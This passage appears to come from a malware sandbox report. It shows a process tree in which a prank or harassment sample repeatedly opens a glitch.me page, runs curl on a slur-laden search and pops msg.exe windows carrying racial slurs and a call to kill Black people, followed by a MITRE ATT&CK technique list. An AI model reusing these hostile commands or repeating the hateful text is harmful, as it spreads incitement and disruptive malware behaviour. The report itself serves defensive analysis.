  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3720
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1276
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5640
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3088
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4188
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:752
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1600
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4828
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5772
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:3284
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4444
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:484
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2552
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4644
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1196
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1792
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3628
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3488
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4344
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5996
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:4624
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2556
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2340
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:1600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5736
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5516
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4352
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1536
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2976
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:3964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2060
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4708
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4616
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5184
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5900
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:1492
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3000
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:3056
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:760
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:868
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:1412
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:5952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:2888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5892
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2104
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2620
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5700
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:3704
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:4140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:3344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5736
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:2556
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:1940
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4448
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:1140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:2636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:2804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4856
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:2816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:5192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:2976
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:5916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:1124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:5952
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:3756
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:5192
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6240
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6256
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6272
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6348
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6764
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6872
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6888
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6940
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:396
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6344
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6500
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6508
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6540
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6360
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7124
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4548
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6156
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6168
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6604
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6988
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6660
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7132
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6968
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6956
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6164
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:300
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6252
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6180
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6572
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6944
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6992
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7156
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6332
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6676
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6260
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:6156
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:6568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6676
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:6840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:6676
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:6840
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6960
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7532
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7584
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7624
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7668
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7688
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8032
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8140
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:6840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7228
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7236
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7308
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7840
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7920
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:808
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:6068
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7568
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7412
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7712
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7836
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:5424
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:4552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7556
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7420
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7320
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:5908
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7640
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:4552
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7924
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7952
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7712
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8072
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:7576
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8136
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7692
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7588
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:7904
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7916
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:7552
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:4080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:7976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:7900
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:7416
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:4080
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:7588
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8316
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8340
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8356
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8364
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8788
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8812
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8828
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8868
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8876
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:9104
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:9136
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8288
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8296
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8320
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8348
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8224
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8824
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8832
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8856
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8900
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8928
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8784
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8780
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8424
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8524
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8644
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8636
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:8692
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8224
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:8816
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "Rasauq on top"
      4⤵
      PID:8580
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "ran by Rasauq"
      4⤵
      PID:8440
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq owns me"
      4⤵
      PID:8356
  - - C:\Windows\system32\msg.exe
      msg * /time:1 " Rasauq is daddy"
      4⤵
      PID:8652
  - - C:\Windows\system32\msg.exe
      msg * /time:1 "kill all niggas"
      4⤵
      PID:4044
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
      4⤵
      PID:8376
  - - C:\Windows\system32\curl.exe
      curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
      4⤵
      PID:9024

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5176

C:\Users\Admin\AppData\Local\Windows Host Service.scr
"C:\Users\Admin\AppData\Local\Windows Host Service.scr"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:296

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

